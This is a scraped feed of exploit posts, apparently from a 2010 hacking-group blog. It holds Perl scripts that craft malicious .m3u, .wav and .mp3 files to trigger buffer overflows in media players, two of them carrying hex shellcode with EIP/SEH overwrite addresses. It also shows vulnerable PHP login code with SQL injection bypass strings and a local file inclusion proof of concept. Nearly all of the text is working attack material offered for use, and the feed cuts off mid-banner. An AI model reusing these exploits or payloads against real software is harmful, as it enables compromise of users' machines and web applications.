/\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />#!/usr/bin/perl<br /> <br />print qq(<br />###########################################################<br />## FoxPlayer 1.7.0 (.m3u) Local Buffer Overflow Exploit ##<br />###########################################################<br />);<br />my $junk = "\x41" x 260;<br />my $eip = "\x28\x55\x3D\x72"; # 0x723D5528 -- dsound.dll -- call esp<br />my $nopsled = "\x90" x 19;<br /># win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/<br />my $shellcode =<br />"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34".<br />"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\x34\x92\xc9\xc6".<br />"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\x14\x93\xa9\xca".<br />"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\x33\x53\x88\x8e".<br />"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\x10\x93\xa9\xe5".<br />"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\xdf\x1b\x1e\xa7".<br />"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\xbf\xd2\x4e\x08".<br />"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\x34\x92\xc9\xeb".<br />"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\x5c\x62\xc8\x87".<br />"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\x57\xbc\x27\xfb".<br />"\x51\x92\x42\x83";<br />##################################################################<br />open(myfile,'>> Traffic.m3u'); # Dj Tiesto :D<br />print myfile $junk.$eip.$shellcode.$nopsled;<br />##################################################################<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-3790880347967857721?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-30455000819603282362010-03-04T10:16:00.003-08:002010-03-04T10:16:57.432-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />#!/usr/bin/perl<br />#########################################################<br />## Usage-->>file created-->>load file-->>b00m.wav >>>BOOM<br />#########################################################<br /> <br /> <br />print "#####################################################\n";<br />print "[!] KOL WaveIOX 1.04 (.wav) Local Buffer Overflow PoC\n";<br />print "#####################################################\n";<br /> <br /> <br />my $boom = "http://"."\x41" x 1337;<br />my $filename = "b00m.wav";<br />open (FILE,">$filename");<br />print FILE "$boom";<br />print "\nFile successfully created!\n";<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-3045500081960328236?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-9861692244883942412010-03-04T10:16:00.001-08:002010-03-04T10:16:35.579-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />#!/usr/bin/perl<br />#########################################################<br />## Usage-->>file created-->>load file-->>b00m.wav >>>BOOM<br />#########################################################<br /> <br /> <br />print "#####################################################\n";<br />print "[!] KOL Wave Player 1.0 (.wav) Local Buffer Overflow PoC\n";<br />print "#####################################################\n";<br /> <br /> <br />my $boom = "http://"."\x41" x 1337;<br />my $filename = "b00m.wav";<br />open (FILE,">$filename");<br />print FILE "$boom";<br />print "\nFile successfully created!\n";<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-986169224488394241?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-76569072785911784892010-03-04T10:15:00.002-08:002010-03-04T10:16:14.055-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />#!/usr/bin/perl<br />#########################################################<br />## Usage-->>file created-->>load file-->>b00m.mp3 >>>BOOM<br />#########################################################<br /> <br /> <br />print "#####################################################\n";<br />print "[!] yPlay 1.0.76 (.mp3) Local Crash PoC\n";<br />print "\n";<br />print "[!] Author: cr4wl3r\n";<br />print "#####################################################\n";<br /> <br /> <br />my $boom = "A" x 1337;<br />my $filename = "b00m.mp3";<br />open (FILE,">$filename");<br />print FILE "$boom";<br />print "\nFile successfully created!\n";<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-7656907278591178489?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-55483963142965136222010-03-04T10:15:00.001-08:002010-03-04T10:15:49.981-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />#!/usr/bin/perl<br />#########################################################<br />## Usage-->>file created-->>load file-->>b00m.mp3 >>>BOOM<br />#########################################################<br /> <br /> <br />print "#####################################################\n";<br />print "[!] Pico MP3 Player 1.0 (.mp3) Local Crash PoC\n";<br />print "\n";<br />print "#####################################################\n";<br /> <br /> <br />my $boom = "A" x 1337;<br />my $filename = "b00m.mp3";<br />open (FILE,">$filename");<br />print FILE "$boom";<br />print "\nFile successfully created!\n";<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-5548396314296513622?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-48360779351640559342010-03-04T10:14:00.002-08:002010-03-04T10:15:21.879-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />my $file="b00m.m3u";<br /> <br />my $header = "http://";<br />my $junk = "A" x 1017;<br />my $nseh = "\xeb\x06\x90\x90"; <br />my $seh = pack('V',0x01221045);<br /> <br />my $shellcode =<br />"\x33\xC9\x83\xE9\xB0\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13".<br />"\xA8\x45\xF5\xB8\x83\xEB\xFC\xE2\xF4\x54\x2F\x1E\xF5\x40\xBC".<br />"\x0A\x47\x57\x25\x7E\xD4\x8C\x61\x7E\xFD\x94\xCE\x89\xBD\xD0".<br />"\x44\x1A\x33\xE7\x5D\x7E\xE7\x88\x44\x1E\xF1\x23\x71\x7E\xB9".<br />"\x46\x74\x35\x21\x04\xC1\x35\xCC\xAF\x84\x3F\xB5\xA9\x87\x1E".<br />"\x4C\x93\x11\xD1\x90\xDD\xA0\x7E\xE7\x8C\x44\x1E\xDE\x23\x49".<br />"\xBE\x33\xF7\x59\xF4\x53\xAB\x69\x7E\x31\xC4\x61\xE9\xD9\x6B".<br />"\x74\x2E\xDC\x23\x06\xC5\x33\xE8\x49\x7E\xC8\xB4\xE8\x7E\xF8".<br />"\xA0\x1B\x9D\x36\xE6\x4B\x19\xE8\x57\x93\x93\xEB\xCE\x2D\xC6".<br />"\x8A\xC0\x32\x86\x8A\xF7\x11\x0A\x68\xC0\x8E\x18\x44\x93\x15".<br />"\x0A\x6E\xF7\xCC\x10\xDE\x29\xA8\xFD\xBA\xFD\x2F\xF7\x47\x78".<br />"\x2D\x2C\xB1\x5D\xE8\xA2\x47\x7E\x16\xA6\xEB\xFB\x16\xB6\xEB".<br />"\xEB\x16\x0A\x68\xCE\x2D\x35\xB8\xCE\x16\x7C\x59\x3D\x2D\x51".<br />"\xA2\xD8\x82\xA2\x47\x7E\x2F\xE5\xE9\xFD\xBA\x25\xD0\x0C\xE8".<br />"\xDB\x51\xFF\xBA\x23\xEB\xFD\xBA\x25\xD0\x4D\x0C\x73\xF1\xFF".<br />"\xBA\x23\xE8\xFC\x11\xA0\x47\x78\xD6\x9D\x5F\xD1\x83\x8C\xEF".<br />"\x57\x93\xA0\x47\x78\x23\x9F\xDC\xCE\x2D\x96\xD5\x21\xA0\x9F".<br />"\xE8\xF1\x6C\x39\x31\x4F\x2F\xB1\x31\x4A\x74\x35\x4B\x02\xBB".<br />"\xB7\x95\x56\x07\xD9\x2B\x25\x3F\xCD\x13\x03\xEE\x9D\xCA\x56".<br />"\xF6\xE3\x47\xDD\x01\x0A\x6E\xF3\x12\xA7\xE9\xF9\x14\x9F\xB9".<br />"\xF9\x14\xA0\xE9\x57\x95\x9D\x15\x71\x40\x3B\xEB\x57\x93\x9F".<br />"\x47\x57\x72\x0A\x68\x23\x12\x09\x3B\x6C\x21\x0A\x6E\xFA\xBA".<br />"\x25\xD0\x47\x8B\x15\xD8\xFB\xBA\x23\x47\x78\x45\xF5\xB8";<br /> <br /> <br />my $footer="E" x (2000-length(junk.nseh.seh.shellcode));<br /> <br />my $payload = $header.$junk.$nseh.$seh.$shellcode.$footer;<br /> <br />print " Writing payload to file\n";<br /> <br />open(sploitf,">$file");<br />print sploitf $payload;<br />close(sploitf);<br />print " Exploit file " . b00m . " created\n";<br />print " b00m " . length($payload) . " bytes\n";<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4836077935164055934?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-4269888699439960702010-03-04T10:14:00.001-08:002010-03-04T10:14:52.182-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />my $file= "crash.asx";<br /> <br />my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;<br /> <br />open($FILE,">>$file");<br /> <br />print $FILE "$boom";<br /> <br />close($FILE);<br /> <br />print "Done..!~#\n";<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-426988869943996070?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-70383502000488258542010-03-04T10:13:00.002-08:002010-03-04T10:14:23.961-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br />include("Connections/config.php");<br />if(isset($_POST['Submit']))<br />{<br /> $u=$_POST["uname"];<br /> $p=$_POST["pwd"];<br /> $r=mysql_query("select * from admins where AdminName='$u' and AdminPass='$p'");<br /> <br />if($row=mysql_fetch_array($r))<br />{<br /> $_SESSION['AdminName']=$u;<br /> if(isset($re))<br /> {<br /> setcookie("username",$u,time()+3600);<br /> }<br /> header("location:index.php");<br /> <br />}<br />}<br />[!] PoC: [al3jebscript]/login.php<br /> <br /> username : ' or '1=1<br /> password : cr4wl3r<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-7038350200048825854?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-83392004187161915782010-03-04T10:13:00.001-08:002010-03-04T10:13:46.524-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />[!] Code :<br /> <br /> <br />//controllo user e passwd da login<br /> if(isset($_POST['posted_username']) && isset($_POST['posted_password'])) {<br /> $query="SELECT * FROM users WHERE username='$_POST[posted_username]' AND<br />password=md5('$_POST[posted_password]')";<br /> <br /> <br />[!] PoC:<br /> <br /> username : ' or '1=1<br /> password : cr4wl3r<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8339200418716191578?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-477902728471509412010-03-04T10:12:00.002-08:002010-03-04T10:13:19.096-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br />[!] Code :<br /> <br /> include("./includes/templates/$template_data_dir/phrases.php");<br /> <br />[!] PoC:<br /> <br /> [PHP-RESIDENCE_path]/includes/templates/cal/form.php?template_data_dir=[LFI]<br /> <br /> <br /> <br /> <br />[!] Code :<br /> <br /> include("./includes/templates/$template_data_dir/phrases.php");<br /> <br />[!] PoC:<br /> <br /> [PHP-RESIDENCE_path]/includes/templates/rat/form.php?template_data_dir=[LFI]<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-47790272847150941?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-75695901131318876652010-03-04T10:12:00.001-08:002010-03-04T10:12:51.632-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : submit[at]inj3ct0r.com 1<br /># 0 0<br /># 1 ###################################### 1<br /># 0 I'm cr4wl3r member from Inj3ct0r Team 1<br /># 1 ###################################### 0<br /># 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1<br /><br />#[+] Discovered By: cr4wl3r<br /><br /><br />if(isset($_POST['submit'])) {<br /> <br /> <br />// username and password sent from signup form<br />$USER = $_POST['user'];<br />$PASS = md5($_POST['pass']);<br /> <br />$sql = "SELECT * FROM `accounts` WHERE username='$USER' and password='$PASS' and accesslevel = '300'";<br />$result = mysql_query($sql);<br /> <br />// Mysql_num_row is counting table row<br />$count = mysql_num_rows($result);<br />// If result matched $myusername and $mypassword, table row must be 1 row<br /> <br />if($count == 1){<br />// Register $user, $pass and redirect to file ?op=admin<br />session_register("USER");<br />session_register("PASS");<br />echo('Logged in: <a href=?op=admincp>Click here</a> to go to the control panel.');<br />}<br />else {<br />echo "You are banned, or you are an user with no permission to enter.";<br />}<br />}<br /><br /> <br />[!] PoC: [RoseOnlineCMS_path]/modules/admin.php<br /> <br /> username : ' or '1=1<br /> password : cr4wl3r<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-7569590113131887665?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-30567241674443568812010-03-04T10:11:00.002-08:002010-03-04T10:12:03.771-08:00# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0<br /># 0 _ __ __ __ 1<br /># 1 /' \ __ /'__`\ /\ \__ /'__`\ 0<br /># 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1<br /># 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0<br /># 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1<br /># 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0<br /># 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1<br /># 1 \ \____/ >> Exploit database separated by exploit 0<br /># 0 \/___/ type (local, remote, DoS, etc.) 1<br /># 1 1<br /># 0 [+] Site : Inj3ct0r.com 0<br /># 1 [+] Support e-mail : 